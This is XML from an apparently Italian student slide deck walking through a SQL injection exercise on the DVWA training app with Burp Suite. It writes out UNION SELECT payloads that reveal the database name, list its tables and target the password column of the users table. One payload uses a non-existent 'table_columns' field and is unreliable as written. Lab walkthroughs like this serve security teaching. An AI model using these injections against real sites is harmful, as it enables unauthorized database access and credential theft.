                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect l="0" t="0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="-5628874">
              <a:off x="242776" y="1152398"/>
              <a:ext cx="22164701" cy="21222701"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="21222701" w="22164701">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="22164701" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22164701" y="21222701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="21222701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect l="0" t="0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8915559" y="504892"/>
            <a:ext cx="9044250" cy="5633316"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5633316" w="9044250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9044250" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9044250" y="5633315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5633315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="566284" y="6578309"/>
            <a:ext cx="7463726" cy="3123040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3123040" w="7463726">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7463726" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7463726" y="3123039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3123039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="11066145" y="2997517"/>
            <a:ext cx="1189673" cy="115252"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1586230" cy="153670"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="50800" y="49530"/>
              <a:ext cx="1484630" cy="86360"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="86360" w="1484630">
                  <a:moveTo>
                    <a:pt x="24130" y="2540"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1477010" y="8890"/>
                    <a:pt x="1484630" y="19050"/>
                    <a:pt x="1484630" y="27940"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1484630" y="35560"/>
                    <a:pt x="1471930" y="49530"/>
                    <a:pt x="1464310" y="50800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1455420" y="52070"/>
                    <a:pt x="1435100" y="39370"/>
                    <a:pt x="1433830" y="30480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1432560" y="21590"/>
                    <a:pt x="1447800" y="2540"/>
                    <a:pt x="1456690" y="1270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1464310" y="0"/>
                    <a:pt x="1480820" y="8890"/>
                    <a:pt x="1482090" y="16510"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1484630" y="25400"/>
                    <a:pt x="1479550" y="41910"/>
                    <a:pt x="1466850" y="50800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1430020" y="73660"/>
                    <a:pt x="1300480" y="52070"/>
                    <a:pt x="1169670" y="53340"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="911860" y="53340"/>
                    <a:pt x="119380" y="86360"/>
                    <a:pt x="24130" y="50800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7620" y="44450"/>
                    <a:pt x="1270" y="36830"/>
                    <a:pt x="0" y="29210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21590"/>
                    <a:pt x="24130" y="2540"/>
                    <a:pt x="24130" y="2540"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E7191F"/>
            </a:solidFill>
            <a:ln cap="sq">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 9" id="9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298147" y="7472670"/>
            <a:ext cx="2631109" cy="19050"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="E7191F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1314562" y="2037580"/>
            <a:ext cx="4298445" cy="251079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Roboto Condensed"/>
              </a:rPr>
              <a:t>Successivamente  abbiamo provato ad intercettare una richiesta di HTTP  GET con l’ausilio del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>Tool di Burpsuite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>in modo da individuare l’inserimento della variabile nell’url della pagina.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8915559" y="7274959"/>
            <a:ext cx="7453849" cy="167259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Roboto Condensed"/>
              </a:rPr>
              <a:t>Una volta individuata la variabile nell’url, abbiamo inserito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>1’ UNION SELECT 1, database()#  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>e l‘abbiamo convertito in codice url con l’aiuto di Burpsuite; dopodichè lo abbiamo inserito sotituendo il codice precedente</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="859441" y="342603"/>
            <a:ext cx="5519340" cy="962025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7519"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6266">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6266">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>.Burp suite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4103682"/>
            <a:ext cx="6146083" cy="816611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3289"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3289"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11961021" y="-4907675"/>
            <a:ext cx="17526836" cy="16781945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="16781945" w="17526836">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17526836" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17526836" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16781945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1952519" y="2685154"/>
            <a:ext cx="4298445" cy="4883785"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4339"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3099">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Avendo inserito il nuovo codice nell’url,  riusciamo a visualizzare la Response  HTTP della pagina  e così capiamo che il nome del database è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3099">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>dvwa. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4339"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3099">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Da qui andiamo a  estrapolare delle informazioni dal database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9818625" y="5367962"/>
            <a:ext cx="5857697" cy="4064135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4064135" w="5857697">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5857697" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857697" y="4064135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4064135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9818625" y="498389"/>
            <a:ext cx="6165523" cy="4492707"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4492707" w="6165523">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6165523" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6165523" y="4492706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4492706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13835520" y="4324212"/>
            <a:ext cx="1009650" cy="93345"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1346200" cy="124460"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="46990" y="46990"/>
              <a:ext cx="1248410" cy="59690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="59690" w="1248410">
                  <a:moveTo>
                    <a:pt x="3810" y="15240"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1223010" y="12700"/>
                    <a:pt x="1238250" y="0"/>
                    <a:pt x="1244600" y="3810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1247140" y="5080"/>
                    <a:pt x="1247140" y="12700"/>
                    <a:pt x="1247140" y="12700"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1247140" y="12700"/>
                    <a:pt x="1248410" y="5080"/>
                    <a:pt x="1245870" y="3810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1239520" y="0"/>
                    <a:pt x="1224280" y="19050"/>
                    <a:pt x="1196340" y="25400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1061720" y="54610"/>
                    <a:pt x="36830" y="59690"/>
                    <a:pt x="3810" y="25400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="22860"/>
                    <a:pt x="3810" y="15240"/>
                    <a:pt x="3810" y="15240"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E7191F"/>
            </a:solidFill>
            <a:ln cap="sq">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>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626621"/>
            <a:ext cx="8761197" cy="3121539"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3121539" w="8761197">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8761197" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8761197" y="3121539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3121539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="-3887688" y="6951872"/>
            <a:ext cx="21985773" cy="16602649"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="29314364" cy="22136865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="10045834">
              <a:off x="1505803" y="3090722"/>
              <a:ext cx="16331336" cy="15637254"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="15637254" w="16331336">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16331336" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16331336" y="15637254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15637254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="0" t="0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 5" id="5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="-3479534">
              <a:off x="10190603" y="3249805"/>
              <a:ext cx="16331336" cy="15637254"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="15637254" w="16331336">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="16331336" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16331336" y="15637255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15637255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="0" t="0" r="0" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9144000" y="5080199"/>
            <a:ext cx="7779516" cy="5018045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5018045" w="7779516">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7779516" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7779516" y="5018045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5018045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="437673" y="3394710"/>
            <a:ext cx="7778839" cy="58635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Col nome del database, è possibile estrarre informazioni da esso come il numero di tabelle presenti. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Utilizziamo la query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>1’ UNION SELECT 1, table_name FROM information_schema.tables WHERE table_schema = ‘dvwa’ #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>che ci restituirà tutte le tabelle nel database. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Quella che attira la nostra attenzione è la tabella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>“users”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> perché molto probabilmente conterrà tutti i dati relativi agli utenti. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Per recuperare le colonne della tabella ineteressata, useremo la query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>1’ UNION SELECT 1, column_name FROM information_schema.columns WHERE table_columns = ‘users’ #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Otterremo così le colonne della tabella e sicuramente quella che più ci interessa è la colonna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="CB6CE6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Bold"/>
              </a:rPr>
              <a:t>password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="437673" y="280553"/>
            <a:ext cx="6878853" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
